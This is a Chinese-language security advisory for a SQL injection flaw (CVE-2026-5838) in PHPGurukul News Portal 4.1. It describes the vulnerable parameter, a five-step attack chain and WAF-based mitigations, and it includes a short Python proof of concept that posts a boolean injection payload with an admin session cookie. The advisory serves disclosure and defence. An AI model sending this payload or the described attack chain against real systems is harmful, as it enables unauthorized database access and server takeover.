CVE-2026-5838 CVSS 4.7 中危

CVE-2026-5838 PHPGurukul新闻门户SQL注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5838

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul News Portal Project

漏洞概述

PHPGurukul News Portal Project 4.1版本在/admin/add-subadmins.php文件中存在SQL注入漏洞。该问题是由于程序未对用户提交的sadminusername参数进行严格的输入过滤和验证，直接将其拼接到SQL查询语句中导致的。尽管利用此漏洞需要高权限，但攻击者仍可远程发起攻击，成功利用可能导致数据库敏感信息泄露、数据完整性受损或服务不可用，对系统安全构成中等风险。

技术细节

该漏洞具体存在于PHPGurukul News Portal Project 4.1版本的后台管理文件`/admin/add-subadmins.php`中。漏洞成因是开发人员在编写添加子管理员功能模块时，未能对传入的`sadminusername`参数实施有效的安全校验，而是直接采用了字符串拼接的方式构造SQL查询语句。这种编码习惯使得攻击者能够通过构造恶意的SQL片段作为参数值，干扰原有的查询逻辑。虽然CVSS评分显示攻击复杂度低且无需用户交互，但要求攻击者必须具备高权限（PR:H），即通常需要先登录管理员账户。一旦具备条件，攻击者可利用此漏洞执行任意SQL命令，获取数据库中的敏感信息（如用户凭证、系统配置），甚至通过存储过程写入WebShell，从而完全控制服务器。建议开发者立即检查并修复该文件中的数据库交互逻辑。

攻击链分析

STEP 1

步骤1

攻击者通过钓鱼或其他方式获取PHPGurukul News Portal的管理员账户凭证（满足PR:H要求）。

STEP 2

步骤2

攻击者使用获取的凭证登录后台管理系统。

STEP 3

步骤3

攻击者访问存在漏洞的页面/admin/add-subadmins.php，并截获数据包。

STEP 4

步骤4

攻击者在sadminusername参数中注入恶意SQL语句（如UNION SELECT或基于时间的盲注Payload）。

STEP 5

步骤5

服务器执行恶意SQL命令，返回数据库敏感信息或修改数据库内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/admin/add-subadmins.php"

# Cookies for authenticated session (High Privilege Required)
cookies = {
    "PHPSESSID": "j5h8g2k1..."
}

# Payload for SQL Injection
# Testing with a simple boolean-based injection
payload = {
    "sadminusername": "admin' AND 1=1-- -",
    "sadminpassword": "test",
    "submit": "Add"
}

try:
    response = requests.post(url, data=payload, cookies=cookies)
    
    # Analyze response to confirm vulnerability
    if "success" in response.text or response.status_code == 200:
        print("Payload sent successfully. Check for database errors or changes.")
    else:
        print("No immediate indication of vulnerability, try time-based.")
        
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

PHPGurukul News Portal Project 4.1

防御指南

临时缓解措施

在无法立即修复代码的情况下，建议在Web服务器层（如Nginx或Apache）配置规则，严格限制对/admin/add-subadmins.php的访问来源IP，或者部署Web应用防火墙（WAF）以拦截针对该参数的常见SQL注入攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5838
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5838
3 Details https://www.cvedetails.com/cve/CVE-2026-5838/
4 VulDB https://vuldb.com/cve/CVE-2026-5838
5 Link https://github.com/f1rstb100d/CVE/issues/27
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/789908
8 Link https://vuldb.com/vuln/356294
9 Link https://vuldb.com/vuln/356294/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表